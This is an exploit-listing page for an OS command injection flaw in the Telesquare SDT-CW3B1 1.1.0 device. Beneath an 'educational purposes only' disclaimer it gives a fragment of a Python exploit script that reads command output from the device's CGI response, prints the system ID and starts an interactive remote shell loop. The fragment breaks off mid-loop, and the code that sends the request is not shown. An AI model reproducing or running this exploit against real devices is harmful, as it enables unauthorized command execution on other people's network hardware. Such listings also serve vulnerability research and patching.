Telesquare sdtcw3b1 1.1.0 os command injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-06-03 |
Type : remote |
Platform : hardware
This exploit / vulnerability Telesquare sdtcw3b1 1.1.0 os command injection is for educational purposes only and if it is used you will do on your own risk!
for event, elem in xmlparser:
if(elem.tag == 'CmdResult'):
cmdRet.append(elem.text)
except:
print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
sys.exit(0)
if(len(cmdRet) != 0):
print("[*] There's response from the CGI script!")
print('[*] System ID: ' + cmdRet[0].strip())
print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
#start shell iteration
while(True):
cmdInput = input("[SDT-CW3B1 Shell]# ")